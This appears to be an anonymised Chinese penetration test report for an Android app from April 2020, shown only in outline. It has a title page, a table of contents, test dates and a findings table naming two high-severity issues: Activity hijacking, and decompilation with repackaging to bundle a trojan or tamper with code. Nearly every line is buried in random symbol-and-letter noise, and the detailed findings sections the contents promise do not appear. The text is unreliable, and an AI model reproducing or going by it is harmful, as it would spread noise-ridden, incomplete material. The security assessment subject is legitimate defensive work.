' w& T+ i9 C0 ^& N e
* x. f& }' ^7 s" ~# H
! G, Q1 e; \% @* Z- D% ?/ @8 l
' Y0 s1 h" s' u$ \
8 D% Q4 k' H% x f4 B# l9 \
+ [. `; q: ^* N* Z( P9 G
) v4 o/ M* p8 h7 k0 t
" `5 i. m. U& g5 Q* {# P
% X/ |/ Y7 I: o3 ]& d" u) z/ p$ \$ f- f" ~& m- C7 X K
4 W( l' f3 {% f, c& Q( h% D ^4 |1 H9 \0 l) S
文档编号: : Q# N/ n8 r" M- }
+ f1 c, U+ C; z6 S: p1 X
& I0 C& J. Y$ A, m1 d2 F$ O4 o
l. h& y+ T C2 Y j; s
$ R$ [9 f* k) {9 V: H+ c9 y
; @- z2 ^+ J) ~. O* X) M
/ R: b) D; a" L, y/ x' S% ~6 Y# p3 W, R7 M; W9 |) j( V
. L a8 U# \4 z" d5 N# Q! y, z; e1 D/ d* L
7 R) M/ d$ X4 F& r/ b+ O
0 z/ n* G: y& U l
# H# Y. E. c; ~' h4 G. Z) y8 K
7 T: `4 v+ t2 U5 b
4 m/ D5 e# r* Q5 d/ q1 R: X1 X4 R# Q! v x$ Y
0 K F$ v8 Q% @
9 E4 U, U% ^& h1 J H+ p1 u; s
3 i; J' h1 p1 X, u, Y3 t4 W8 P& l, `; V% @9 I
; {0 [/ H# X1 t( S
) [2 C, P6 k8 F! W1 H( X . ~' \, m3 f* T( \, H& }+ [/ W
5 t* x! y& ^. V+ t* U0 u" R& k# B
9 s4 O% {, ?/ {9 W- _
7 D: o% `1 A5 u& {' g
" O* T; V# Z+ `' G* V' D( W
( r) X8 y+ E; C- ~, e 8 L0 ]& Q. P( s: d
; Y" Q+ M& M) U$ w
$ C( O$ | K0 G# a" w; J8 i t& A/ U0 ?. P6 S* l" |
1 P+ ~, H3 J; J- Z R
! a- T" W! u- r0 l& M/ x( M0 ~0 M
4 { }7 i2 Q( }! j. c
; h* k. |. H: M+ P 某某某APP渗透测试 9 y2 E+ I* F, _, S- O. ^0 @1 a
3 B* R( u9 D7 K
. U+ K4 l* t2 j4 i1 G2 e% C& c, J, r2 ~
g/ l# _4 ?- v* c" a& f3 ~, S4 B5 B& M/ {: e: K7 U: w' i X
0 s. `2 k$ u8 k! w+ @7 p8 A* ]' ~
3 }2 N% V/ o( d
( B7 q6 W# r& W3 S5 i/ F
3 n' J/ P# l* L- Z7 A" E X7 w6 f q8 N% k* e
" G- z* _0 l+ H0 R* F% G2 ? 8 g0 _* i' t" x! K4 E; z7 _
0 L* c- O y& g0 `; I4 \
; m2 [3 h" w$ G/ x/ {) {3 t: Z: y0 n1 |& R) q' L+ g
5 q7 C- l, C9 Z9 X& A( {, }5 ?9 |3 D; h& L! c8 x; r
! i, C9 u( S0 P( A
9 u6 K' R8 `9 i+ ?; q" [
- o: z J# f# t C- _
5 k2 R) E3 g+ V
- I$ R0 X- T( E; K; X- S9 D1 [9 e
* ^4 r4 [8 c: r6 v3 H
; `; S. ?! M$ O
: s j) v% Z: y8 j2 a
8 I+ L4 r1 w( p- N
9 s& e1 e: ^5 g+ e
4 }, M, o0 A4 ~0 E$ {3 _) |/ @ 技 术 报 告 8 A+ z5 P! U# `$ c
# c. J, W: M$ d3 [' `2 R
# G$ Z3 y, O2 l
* G, w1 \" C M( j2 G " p4 O; T3 z0 c# V% g+ b
' I5 ~& N7 z* m" {6 _; k1 L! i
# S5 A0 d8 V$ D. Q
5 t- ]% P1 X: U) C& S' T
/ Y1 S* H( M4 H% p# T
5 y* ?1 y3 s7 i( T/ ^
( l0 n/ L3 {, X6 S0 L; K. u: g: w/ P3 T" E: s2 ]7 T
) O- J- b8 e' y) Q8 C. m: L" p
$ _% t: d( y; n
6 p! H, J h2 c& B7 O! A( X" Z2 @& L }
, M- s' a' Y1 C1 `# E" h3 `* ]2 q. U9 X1 g7 [+ U& I. C
. W1 Q9 r/ k+ d: O' U- H5 n Z
: D0 N5 d2 N/ s, k2 ?
4 i7 {2 w7 Z/ y; o- W/ [: U* q1 Q5 w$ N, A# `
' b1 E0 ~* I0 M5 e# M+ h* M
i( l) P i1 V! w4 u( D
* A: Q2 { N5 [6 { `
* u6 W5 I0 G8 w7 ], E8 x( c
' y w$ K& V$ V7 e8 v$ s, p/ F# A/ `! o5 V# p& i( S0 i
. N% i6 J7 J) i, H/ X, j
% c V1 A A% Y# N7 j9 r4 f, E & J0 }! s, ~: O- T K$ M
4 N' Z) M- |1 \# ^3 Q9 U
- g$ I" Z# O3 w% d4 Y
8 w, |7 A3 [# O" ^! o " d5 N& _- i" @! [+ H1 j' Q m
5 R2 f) a+ L: I) R$ ]
' r* i3 o; k2 I8 `1 x2 U7 R( }6 R
, P. V7 A2 `9 z0 P' M6 R
; e- _/ ~% P+ g) I& @: R
9 q1 R& r' o, t: C2 H
6 R( K! s$ |& `% T% _: p, e
: I5 ~5 r; b" p: D" H8 g" A3 B% k5 y 8 R. Y J8 c- E! n4 X5 N" v
/ b$ Z0 b6 Q9 Y4 X$ V+ H& r' p
7 B ?7 { |# T5 s! D, L9 F& O* z, O9 O5 [$ E, A/ |
) B! \' l/ v. m! G9 B3 F% c
7 j, }3 P/ H+ y! b- K
3 v# v) V" l9 B3 W: X" l
6 @" m! g& {/ Y [2 K5 x
: Q+ H6 C+ h2 c9 {
% p" i2 f9 y- u2 q) L% ?# T) I9 N3 d
$ @8 d, ~# v6 U: \4 ~
1 @( M, p7 L* m% p 3 v' _" [" ?" Z. Z
& t6 c9 Q* ?. H+ Q
( w0 `1 t8 R- l1 X! g) i" e0 G. v, B
% x! Z1 x1 p) d# |
# S6 `: i$ x# `' P9 S+ ^9 W" j/ ~( d* m* U }2 ]: U4 w o3 [
1 F9 n9 x$ M4 }' f
" q8 U# k9 i5 H, d" `
: U6 @( _) N& O+ R
1 t& s! g% a% G - A5 L4 ?9 _) q& _ n* X
0 |+ h* h6 a# d/ @" n ! ^+ b6 R7 j5 ~# O* S
& f- j1 u) @( Z" a; b
" H! K2 y- J2 w, V( ^
( n! b. S. b( b3 j2 G# | / R$ y( N$ {, N; S
8 a+ K% c/ S' k8 ^4 E, H
- m2 ~3 L" x5 v+ D5 I8 w5 u" o2 l2 S" [' m
! c; I; V' V2 G& Q4 n$ K6 m
( z3 Z3 L6 i0 s, L7 k
/ G+ F( l5 x: E) h1 Q- ~, |# {5 Z . S" }' M! f* [$ u! f
0 E) O* }2 e8 G$ a7 D, W ! ]/ ]$ b- \# r+ @ P- c' f4 w
8 v2 M7 X( d: j" g
8 Z/ C( }; w% ]2 G0 j+ c+ Z
; e, p% W- P/ J& v$ H1 v% X
7 X1 V. ?% g4 H9 a+ I' E0 z
. G2 { D* N. a* f & s" _* f& [; d5 u
5 G; R/ a9 W. L1 d1 E
8 H8 x4 O# P; m# B$ X4 l. T: l* y3 p5 [& [9 }' \( C
0 A# C( J" _8 u
" R, P+ |8 b6 o+ k1 s" N. ?
; k z/ |7 g; e( a) S% k3 |3 k) [; j5 Y& S4 T6 b
; g% c0 N$ x8 r& Z
# J4 d2 W- k9 L v
; q- I+ u; b( j* p6 X
* T, e9 O' {8 {' U! ^8 v . |' k* O$ b4 q
9 y" N- F! G$ ]4 [3 K& Y
& f ^0 I2 F2 C
* q7 d$ P3 B8 u) d 8 N% K) U# [5 h7 E
- ^* k% B2 ?0 n; g/ t! G
5 O" e) O, m8 p% r
' `0 H; n9 I3 N4 v6 o3 G
. ?6 C$ L$ n: _4 k
" u: b; |: ?1 V7 u7 s. f
7 G' @" k5 @# o3 J3 [; E
# T9 `& C% R4 H1 m$ e k7 i" Z6 H* P
9 j* [4 m3 g/ Q: m; c5 a0 B. D m
+ L, F; a. `! V
) m a& n8 ~2 h$ e
$ ]9 _2 t5 h2 a8 t! @0 h# @. _: F" G# o8 `. v0 c# P9 z
二〇二〇年
- { e( M0 s i: x5 J0 V. E4 E3 I( J* Y
% ^, Q9 `+ k3 {# R a" b0 B/ P" w6 L
1 g: }* @ x% s$ J6 y1 G" H
; s' z" V8 L" k" x! X7 J2 B% n% d7 c5 K' T
$ Z5 ] e& B3 {" v
% E1 _- m# S1 n" K8 A' n2 \
+ v3 \! z# S$ y/ u4 i; _" ]; [* A& b
! j- o' ^4 c: E/ R+ v7 B1 V( D 7 H' U7 J5 ^0 Y1 z& F
5 K: H& J$ ^* c1 j f) u
/ ^& i/ ~7 T1 h) _8 A& a8 d
# s1 W+ U* F0 H2 h/ s, b
; l" ?4 y! ^( |- W# e; {* r& f2 ?$ T# |+ e* C w
1 M' x, n, W, [+ J) s* y+ r
* M4 j8 X9 d; T E9 t
" R' k' {3 n; _6 }6 N. W
( \4 L- a3 w- d3 R6 V4 ? 4 c g! R1 y2 a; \/ m2 u0 Q7 M* S
/ ?: Z& F& U* g4 G8 ~) A( g
目 录 0 G9 I9 C; y0 _4 k* h8 S/ @: O
4 e& }; F: T9 F1 v) H7 s
8 f0 f2 V' Q$ I6 Q' w, [& g9 Q$ D$ h. m! Y) l" Z
- p& E9 a) I3 ^# x L3 |
/ q w! `3 P1 P3 v6 F% [7 s$ A
% N% W5 {. d/ r3 I; V0 k* k5 c# W9 j0 r5 s3 z
: W1 L8 r M+ L; `$ [8 m
, P: I" L* u3 T0 j; _$ d3 P
: U. H# r* }8 a! n/ f9 I& d% N' m+ a
& x8 `% [/ X5 [" |6 Z' \0 S
4 I+ I: l1 Q% y, c) ` n
* H/ w0 ]6 F# j
1 概述... 3 7 } o5 e9 G; I3 W: w( {
+ Q$ ?0 Q' C. C+ I0 [5 O$ q" s
7 U- Q' ]3 t4 H5 V. p7 C
/ E$ e& J8 K. D3 D. I8 ?
4 w" I. \- W+ H. _% u6 ~
! U. d2 S+ Q6 I: F8 ~ 1.2测试时间... 3 " v3 H9 @+ R( d6 b5 Q
2 ^. g/ z( Z8 b6 b
& F% U# }- V9 w2 l9 E; O
2 ^" R! M n7 f e % M" d7 w4 J' O) Q6 ~- }# ?
! ?$ i6 w6 F! f, L
1.3测试对象... 3
7 P' H- A+ P9 S" P7 I3 o) T% E! N! \$ l L* k$ @7 _
}- O5 g- l2 {7 f
- _2 t ]- ^, O8 T8 y
) J) S6 u7 p9 A" u
# @1 U- S5 s; J5 ]. z9 a& N9 ?: e
1.4测试结果... 3
- |2 l5 f( U4 u- {% P; n8 }8 _9 m2 d+ ?! Z# F
' c! D8 u3 l8 K) r
& }( P ?, V( L; _
9 X! r4 c& n: o. P$ G4 Z: A& M4 z# R& W( `) k; Q) q
2 检测结果... 4 3 c9 J- ^, I% w; |7 f' Q$ |
; u2 P( v& D" _( }: r* b7 t8 n
& o( Q# O; N( q! _
# V ^, u% N9 y9 r( _5 ]
$ z. |" J$ u( H g% n' Q
& o+ O6 h1 o6 q- W/ p 2.1 某某某... 4
! S/ Z w, N& q* `6 b" D A) Y4 k3 e2 C, k' R
' R$ Q4 V9 ]2 ^" A! s9 m
0 x) n$ F8 ^$ y/ x0 d1 Z
8 V7 r P( D8 p
5 K) U5 p7 X8 k5 ~% i, u" c3 W 2.1.1检测目标... 4
( ]7 ~% Z7 z3 {8 J% q+ @; I* d1 m8 ^0 Y% Q
! R0 \% `; u) O, S7 I4 z8 X+ h/ {% }5 @" u% t: U
- j" T8 P9 [4 R' a2 U3 X/ ]6 B
: h! s u% l5 r6 H7 Q' Y8 R
2.1.2检测结果... 4
6 D2 ~6 }2 [4 k8 k& t, L5 K4 g2 Q7 w, ?4 \. X9 i& l
6 X. k3 J! o- s- e B8 }- C
% Y8 k* ^! K0 {0 n
+ Q% @; T" n- j( C- |
. @5 i& ^- X8 [) a j5 D1 X 2.1.2.1. 4
; V9 @5 W% O+ b
; M0 q# ] t9 o/ M& D
, v+ h, ~+ l% u3 F- N8 s
/ k# o" _. Y+ Q' t2 z! P w5 F
+ h( a9 b# Q) p4 k! Q* e9 O, ~( ^4 p4 p7 ]* u1 O, v- M. T% O4 N& }
2.1.2.2. 6 $ i* j" U5 X. u
; m4 j9 n, X# a
) O5 _( ]# Q; \( k/ h5 R6 z9 {+ i* N6 t& n3 y$ j6 T
/ k& ?; O* U5 u
; v6 N% Z( _9 h8 w7 T2 p " Q: V7 ~3 E3 m) Q6 t4 I: v
$ F# [" x' m/ |! K9 L3 S Q
& d/ I S! s" X( A7 i8 q1 n
. p5 @$ X) Z7 B) e+ q! b5 |$ n) G; `1 K- _
- z1 q. u0 z/ T! ]. n" f% K
/ v. ]+ k, a! h3 E! h8 u" R
# V# H# |- A3 `5 `+ y) Z
$ V9 n8 G/ C' X* [( r
/ O/ w J- c. o 1 e \' \2 s' }4 x. W
B; s7 ?! e$ P
' i7 n4 U) H" N# ]) W7 t3 w; v+ n1 b% G
7 A" ]: t( B6 o4 |1 Q 1 概述 ; F U I2 b4 I5 a( _
/ l/ s" D7 E0 v
1 P/ o& O3 ]7 ~7 b; t0 m0 R
. z( w! ?8 j, }# E/ m: H$ y
5 ^2 Q9 Q7 P/ X( O3 H: H3 @4 N7 k, R6 _6 s& A! L, o
1.2测试时间
* `$ d( h5 O3 k5 o; f2 @$ E' { E# g; m# t
4 c( c# I& D. c, `/ N9 r: P' Q$ _; i( \
8 T+ @, V7 A; o6 @0 N `' f
) T. Y' } G2 H: r0 y0 m2 T9 z( h8 o% Z! V7 i6 n, @
& F4 T% [: h% f, r& o2 H7 L) f, W, X, q! ], Q+ x
* D: {$ b+ C. g
4 C# m D( w0 d& A; s, r
* I9 Z" ?+ b# m. _9 R8 c4 G! s5 b
; P' Z- j7 H( f
4 d$ N/ v* F$ `) D# Z) E
+ J9 `$ T4 r! O) _; {# n4 } 渗透测试时间
7 U4 X" h( R( S, I* p( k3 w6 |6 g m$ W( ~$ M9 e3 v
* [1 T. u) H$ g0 f* ^7 p$ j$ y% F1 Q
( O8 C0 K9 U+ H: a8 s* ?
|
' b( g( O! m' T5 i
6 p5 p M7 h- N; `3 E
4 B0 `- j0 ]: l; C& v
9 ?3 ?% } W# ^. W u4 ^ / s5 o# D% F( }8 M
7 e( f, E' l3 r# I2 ]0 V7 c, l2 y
6 L( L* V3 @) Z0 M: D1 X
! W0 {7 Y9 ]2 Z) L 7 C, a9 x# Q! x' V
& ?: v! i! V8 h/ O4 N2 g 起始时间 ; E9 V# \! Z" _$ }
8 |6 ^1 ~" J) z$ B7 a* i
; N! F5 r. R( G# u P. W
$ ?. l) Y1 {* @: y | ' ^$ n7 `9 `% Q! K* L# A" R1 X
2 D+ V9 A k9 X* {& ?
* x4 V" O7 H8 x# r; @5 F( ]
' Q1 ^" M4 }/ Q5 T" X- x5 r% x 6 g$ n2 B8 J2 a# g+ {& x
( f3 m6 ` {+ N% r$ W, d* J 2020年4月6日
6 o7 A7 @; ?/ y6 r9 s; j" j' J L1 ~- `' d4 y$ q
1 C% u3 \" k3 z: ^* z
+ S+ D, U6 p/ W3 K d5 \6 b A( p3 G" { |
2 ]% ^ G& U' s+ p1 M/ I. M* v0 T
' ?/ L! b, P+ p! A5 @
+ t8 d* g. P, ?. L0 i9 g K& K# ]9 o8 l
& L- v- @ j5 x+ ~7 p& M
7 e7 K$ R% X1 v1 i
& G" M1 J2 f4 s5 H! Q
* q0 n9 x+ z1 q1 C& F * U( `. o* C7 e6 a; Y
" n p7 v& k6 u4 _ @* {$ j6 d$ L3 K
结束时间 1 o5 e4 }4 A7 ]: |! l
8 }0 V7 R* t4 b# Z
0 x& ?2 ?& K& y& n- _0 O* q2 `
0 v" E+ U3 L8 E* L$ C1 |) y | 8 V; i6 ^- M5 l) U9 x0 g% P
2 B4 f$ p5 G Q2 I % O3 A8 F/ W+ s [1 m' u
0 w9 E, D/ V7 u: a/ O9 l
6 n+ K8 H+ x9 Z* i4 r4 y
0 d% @, @" l1 V1 ~8 W& @. ~
2020年4月9日
1 P6 `& N" `* s) T, j1 }; w1 [, }0 W( m' y% q# p
5 c* r5 M& {6 {4 ~
6 c4 a8 I4 n# r
| & l9 |$ K: G6 h! l/ p- a- u; I
" u# c( X6 e# I6 w4 k8 A
+ Z U$ U8 i7 d4 b( G: B1 ^
' [9 l: p4 _2 J0 y* P+ p
) j& Y4 `! g9 n( @3 ?' o
( j% n( v9 g% u2 j7 |; s
7 ^4 Y" \' Q! L8 A, \2 G
1 p) H% ^! S6 S# W: q4 J
& M2 ^: F N+ E M2 q1 ?7 d
3 E* S+ z+ A; T' Y% g" W4 u9 M% ]. ` 1.3测试对象 _; A% z: _# Z3 F0 \6 J- V
- R: _5 H& H' j! c* r" j8 g
$ p% U; A* X* `3 A5 O
" J- z# V0 x' G* Z0 V1 J
3 o8 L% ]" k7 B5 E& m2 ]
& y1 F: l) p8 ^
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: * \9 y1 ?) d; X/ v3 _2 {& i
% ?" T3 D# t" K5 r+ M, b2 n' }
- P6 H7 X# y5 X0 Y* l6 m- ^
l Z7 o& z% h( H6 i: D3 }
, X3 }! F5 u, u# e
, P Q7 S1 i& V, A; j6 K: O: E 表1-1 检测对象
+ ^0 Q2 M* q4 m
9 Q* V- g% [3 V( j3 D
, F4 b1 S E1 o4 _$ d% k6 h$ v
* y5 q" e7 @4 _% S/ ~
) c& j g4 _, ]! H
. \! p+ C& D8 ]: n0 L2 @3 F # R o# u% Y# V- @
8 h8 `9 l' y) o1 [9 x# k - E5 K5 n" ?8 G) M3 U3 W% `
" E/ h. D' j+ F- z8 ~ ' L T& G/ a* t' O6 n
5 M0 }6 B, f$ k, _
. z r) v/ T+ g: _* n1 A
' W. x0 J7 X0 _; p, j. \) u
序号
/ w% D- D: _' N3 P9 J2 ^% C$ V
1 @6 U, M1 l% o4 [+ ` 4 c& ^8 G6 ?6 B/ c7 X' s: P
& E* \2 L1 l4 y" V) X& ^& g f
| 3 D0 C4 K* c0 q8 I
9 ^1 p& q9 z( Y/ Q! s
1 m8 p& t- j7 g9 t4 P& n9 ^' w, R) P; A
% N: O; w! w' H1 ~7 B& v8 ?1 m2 D" D* U$ W
测试对象
4 H& M" s( \* z, c* W1 A
- i6 X( d8 T; \( @( z+ c% D 7 }9 R2 p4 L o' K1 {7 R
- X6 n* Y, g. X! `% W |
0 t/ F0 _! Z8 P9 G) @( Y
0 S0 j9 _# U* v; }( K2 @1 D5 F
4 x' _0 T5 H# D G( V, E4 p0 a3 b3 n" [/ C, G% [+ w* F/ @
5 ?% T Q2 c5 X/ _' ^5 C1 ~: k: X$ M! f+ u
测试地址 ( G/ E' w \5 o& |# u9 ~
( H" F; T1 q* X * N8 Z6 S: ]8 L+ B/ C& g+ k
y# {9 g( L/ s1 D5 ?3 O. E* A, [. ^
| & c* u( {; O* D7 R3 H
3 C1 M8 S, b0 @' Q: }4 A 1 g) {" v9 f3 A0 X
, {5 i" U, \2 W( s4 o! I1 t
( p* l4 {: _6 p$ r
6 L. E+ q2 D: p- `, C( O" j+ }- K
安全漏洞
$ G/ ?) c' A8 ]- y6 d
5 h- U Y1 }) r5 Y- n6 s+ D5 } ' t4 H$ P- p. V e
# |0 Q' Q8 [1 k, J+ i9 o2 u | * v' M% n# L7 C1 K
7 ^# x6 e4 B# L A$ ?
7 ]" L4 t) K5 ~: v9 k5 V; \: ~! [' \$ Z7 i6 V
% \2 q/ ~% e }: n( O% S4 r3 B6 K8 s# B( [
: _, v& T% {7 g9 {8 e+ @5 x
' C C4 Y( ^3 s8 c7 t& \
0 n" u/ V2 Q/ I
% Z0 o' M y: t5 P# Y
1
4 L4 N7 f1 J5 C
, [" U C; ^& b7 _. d5 x + f6 l5 t" e: L; _
* ]" X& c3 }% T! a9 e
| 5 X; ?/ @7 C* c9 b( n' q6 d& w" M
, p" N, |0 g) f $ V$ ]$ f; r! T
. A9 u1 j% t2 W' ]$ a
$ B# G' m! O! R; y1 c
) T9 t: q* H+ h) J8 i 某某某安卓APP ; a( @! c. w5 Z/ f' ?' ^1 e! c4 ]
8 A& s: H( t2 k
% N* f5 i0 u; I- X3 ~( z8 Q: P
0 t3 r0 Y" r% a: B& ?
|
4 q/ S! r& Z) d2 L4 P
. g( t* a: p, r
" `2 W- ]( |2 V3 d( J2 G9 a9 R$ T" K! A3 R
" H& S& o2 L& F# \& r6 L7 Z( `% F5 N2 R. c1 m! @* S
. R* K( `. S( N3 F1 a2 X F) ]8 V! A( N( ] p1 k* e# M
/ O( I w! F) v( T
% l( x' \- I1 y+ l7 X, F | 6 L3 K$ E% J. @: ?* H
/ F' P1 j7 o M) U, B. h* q2 }
# e& d9 m- V8 o4 e
- y7 ?5 ?8 j% { I4 O3 a
3 R& \& q8 ~# @" d
! H, n7 z# ~" d 2 : G6 x* J) ]7 l
4 p2 b" F" A' | m8 P! `* ?
; F8 t, `7 t2 \& M% S9 X7 J. {
, ?4 ~# P1 e4 D& S& L | ( k8 {9 X" y' U' [
7 A( ]7 g" C: m$ z+ @
9 q$ M. \, m6 z0 V# E
4 X( L1 j- `2 g, H
1 n: Q0 ]; _2 s# ?3 ~) L/ ~0 J" B, U* d8 @1 |- n$ o l. R
4 }( f7 G" \- E$ H1 ^
; Q% c; Z# U; j7 ~ 6 K7 F* X2 y: b
3 X) s1 K1 I1 s" ?* X! v3 m
1.4测试结果
9 u( l- X6 X: U- t9 f0 Q
3 o7 m& p6 [" _1 K& ?
! K* t) |& Z( e1 Q
( `/ X$ z" Q# M# t 1 I$ U" G' S, e' \) n* N+ B
2 P; ^6 k% c+ S, c
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: % t2 ~( P# K% Z% c1 L2 B' J' l
" E5 j/ w8 H! a t
0 _# ^$ p, _3 V$ ?. T% E1 u
; n# C4 p X/ ]7 K$ n3 M/ d & t! ] E1 y& t" Y% X; \
; G- X7 d# d! G5 b$ i; C 1 f3 v( t" `2 i3 n2 W% [" m
* T2 [+ l- l( x3 s" f, L. Z" E
" Q6 I e/ O! @* ^2 [- I5 ^& Z9 Z
" h! G* a9 @$ N6 |" Z
0 g6 e0 L/ p; D3 y: E& p" Y9 ~' c$ ~: i" d1 _6 V
4 E4 _5 s# x& q; V4 t
$ t2 N6 I3 Y+ y( f8 m ) |! v" V/ N s3 v5 y0 {
9 P+ h4 b3 g% j9 l2 W$ s" A " V$ R: V) J; d! V3 S
8 o& `2 R) W& F9 J: e
3 B' \: [! T6 O6 ^! C" i/ [+ w1 f( }
1 I" c$ G. m/ t, q3 J( h) j
; } D4 V" `7 @0 d9 Y$ o" m6 w 序号
- v. `7 `0 I- A# n8 C
$ W1 T1 \" F1 n; j& y2 }9 q
( ~6 O; y- G: b# m
# ]0 H4 S' ?* a2 h; N& u3 O |
, \& Z6 N8 M2 v2 o
8 v4 a% }; M" x 1 S% ~% H: ?# ]2 P
" h h# y4 `" }. b
6 z. l/ g' L( L- t4 o" a+ |
+ u2 n$ Q1 k! T; E/ X
系统名称 # B* Y7 b- f6 V9 g G; W
1 f3 x/ j" {5 R/ x \
9 y) b2 W! V) f/ j& {5 C5 l2 C( f# ]& p" b( E
| 1 P$ J$ m! T8 c& v2 a$ H
6 ^0 R) \* p7 i4 N% h, r, }
B# e" r* i4 w2 R7 t! G9 q8 e7 h; I
5 X6 D& z: m/ J3 u* Y' a" }7 u
' G/ n8 Y$ f) z" m5 W6 S) m) h: _! [ 漏洞名称
4 n4 e. H0 f: M# h z
D3 f. s. W/ D8 s5 p5 C
" {! A. v6 s( P% o: q) y* F- V- m( _ H/ f4 k7 \3 _4 g/ X
| 0 [$ l4 K' Q* B" o+ v; F0 D0 Q
5 F9 e# q/ @+ M7 } }3 [3 q, A7 o
& \* I9 e. W( `' N( \. ?# U: w, I! f: X( e5 u6 W
+ T: L% ^: y$ u
# }5 b$ `" C1 W6 O! N 漏洞危害
- t% D. X' m' r0 O! D$ Z7 f7 x8 o7 x) A) X
0 E& i3 y8 [3 i2 Q
5 k, T4 [$ N8 Q+ v3 G k | 4 ?: E; r& G4 w$ m
! w4 Q- i1 C8 }" U: M6 n
. v$ t( f$ o+ H* F1 n7 t5 H& J2 c4 s2 D, R r; b
9 [3 g U8 h' X2 U ~0 c
- p0 L$ b% `! D0 T5 Z, {
修复结果
# @& J$ R# @7 b; ~
0 |7 {% h' s4 S" N' X" O# i( r ' ^2 T9 H/ |, `7 `' t e% `
$ h# @1 ^; z) I( R7 D' E. O
|
0 \. V8 N" @& ]9 d/ A) I" k3 t
2 \. x( q+ _) [+ t: a; W' E
: c: K$ S& S) x d
4 _0 F9 X+ k9 Q5 r- J9 ]( V8 F
w& ?7 i; l! {; D6 v4 y
! \) h8 I3 j& _ ]& l$ a7 q 3 W( ~4 L4 O4 x- L: w
2 N) w, ?/ ]. A9 K5 j' n) z
0 ^7 a' z: r4 Q! h
0 D l7 O" N6 `$ @" m 1
: `' x1 h$ l: d6 Z* Y) _: o. F
3 M! K) n. \% N4 E
8 d+ t! E- P+ {
8 r0 S. B; S4 L" {4 n5 c | 6 w, ]" S m+ ?6 Y' y7 L
1 N/ G4 A, O, ~6 c8 f' o) |2 |5 o
: l" d! g- ]' q, z
6 ^0 a \4 j: z9 P2 [ , H3 Y* ^1 }" E4 a3 V
' e0 C9 l" n0 p3 a; ^ 某某某某某某APP
% Y1 \; y4 |7 a4 q! ^3 Q3 K/ W; M. V# c( k3 L- V l
* Z3 F3 ^1 g$ ?: m
' Q$ B+ r$ x# J% x
| ' L. ^+ e# @8 S1 A! P
& Y& A- R Y4 l0 X) p- l8 e+ f
2 k9 z% S% A0 t5 d; Y% J9 X! [/ H
* r) f0 c/ p3 H( u
8 Z2 }$ j3 l+ k+ r$ K: L: _1 A7 F9 ~& ^0 U7 `7 w& @
Activity 劫持
- z( {' A1 |5 P. I, t3 v3 B; X; J! G& [/ q$ `! \5 S3 n7 w Q
, \6 W! I5 M; d
. ?* s6 y, [# t. L6 J
5 ?/ s' S+ u+ a I
* f; O2 ~5 A0 M4 ?1 {# b" t& y / ` B4 \4 H6 t9 D r
. E7 w+ C& _9 t1 h6 y' y3 E
3 X4 C. q# g9 Z. ^
' l# U2 F5 p5 j$ h! Q0 t/ | | 2 I" `2 |6 w; C) s$ _5 N
[& ` }. M* f: v, B; r3 D $ p" S* L' q3 J9 [/ q
2 N/ C2 d' ?7 i* E* R# O& y4 k
+ Y0 u0 h4 T+ p. c. ] c! O# m& M6 _; d! S3 k# n8 W1 I/ Z
高 4 y. C. g2 H* M* w1 m- ]
; X9 T& ?6 p# t/ N" i
. H8 c1 l9 B9 e6 ]5 T3 c- c1 J: S" z/ M1 \- y' s; `) }
|
0 ?! t( s9 E* Q" n
! U3 ]$ M& s* b1 {8 C0 s' A2 i % d+ v4 n" x1 J/ A2 S/ v6 D0 u
1 [" Y( [# M+ L9 x' p
8 Z$ m5 I* n8 [- U# }
3 b1 [9 u" l# Q3 M
$ O; F3 {. m% D
2 S L1 p' }7 X. p7 J2 I. O6 e
/ v# }% c# c% ?% C0 J/ N: D- }8 a
" a8 d& _+ _. T$ |2 C; i | * s9 i& q j' e
6 a8 w6 ?; Z: G, H
1 T7 X" B7 t1 w7 T# `$ E
' T4 T/ t0 Z$ v, X$ A% ^
6 x: W G# J0 }/ P0 @* P* n
@7 B2 I# q6 |% v+ x7 w7 ^ S' b
2 i" M5 M& O: z) y: K# J6 m5 d! H4 f) S; k
1 [' n! S5 N/ U) `- V
8 I: ^- `2 T1 ?( D% R6 }* n" l 2 ! a0 t& O7 A- K0 f
# l( ?+ s8 y* r/ _- d8 n
* Y4 y4 ]: \: V( X& u! f2 G. t& E: T2 t( t9 I
|
$ G/ b/ h# B1 ^1 ` t- |5 C: s6 S$ z* t) g
b; ]. Z& _* E: x: w7 L* l
; F) E" @9 \# \$ Q$ X
1 {# [" |7 T; [6 X! P) R7 }. J& Y4 e' N h7 D: ]1 x
某某某某某某APP , R8 m @! F' O- ^4 W
L" K0 w& T, I! Y: K4 J0 }0 Q
& |# c6 R$ k8 j1 c
& {8 R9 y, g# i1 Z3 R
| / m% n. H( L0 i6 z0 U3 M# B# Y
, N" m- \ t1 F# E& @. Y' s4 S + ?8 s) k' _1 S+ ]+ v! A1 O
% a' d& |+ E/ A& b7 w% r8 Z
( f/ Z$ H% o8 G7 t
& g* _# Y" n# e9 K
反编译二次打包捆绑木马、篡改APP代码
; v6 f9 J+ j( P+ i" s; |
2 D8 J0 @& a8 k; P/ _- A4 Y+ n 7 z8 ]* a/ }- K) [
4 }& W: |8 g. b* _* o( U
|
6 g. c# \) P* \ X C* r" L0 C7 |% S" S/ X$ X, v
) b: u) ]4 O, e+ ^+ Y
( G4 e+ A% R, q: M
: u( f( Y& P: _) `6 b; ]6 K/ I3 j, I/ x
高 / P( r& G% L# Y( Z$ n& q3 _. x
) W, i; m2 z" L4 x
8 z, `1 k1 a: Q5 H# ^
8 b# y$ a; U% p$ B& f: g |
6 D: z9 e9 f2 h' \& l* k S
) J& K- N; f. ~: s9 i3 p' F
/ U% Z' T4 W/ o
6 Y7 _" r9 \ ]8 ?
! g( x6 Z8 a; P( Y, U$ M& v$ a/ U
' E8 e- m! W0 t* y" X6 Y a
; c. x& i0 B7 O& E9 i4 e0 F. ]% c
! m- Q/ a' c; R4 k! C7 T# r; g$ p% c+ V: Y( t) @3 m
| ! P' L. X/ ^$ j* g) T& Z, g, x
5 s5 [5 B! \; H
3 a. W0 F3 X1 Y- u
; g$ d! N1 P8 _/ {1 X
7 q5 i( ?, W: c+ i
$ i. |$ ^; ?# X
8 \7 r1 X+ x3 i5 L: a. o, N3 K3 t% b1 V _; L
4 o9 g9 _8 {# k: v' H+ p& C" o, Y& Y9 V3 Y" T8 E! A
. w4 |* S2 P$ |, J* K* ]. J. c4 @) k& n
) Q& @- u; d2 J; ?
6 o1 B! s" o3 {: E! O( J" h0 G. m' C& A3 \; ^
- P3 E- n0 }' d
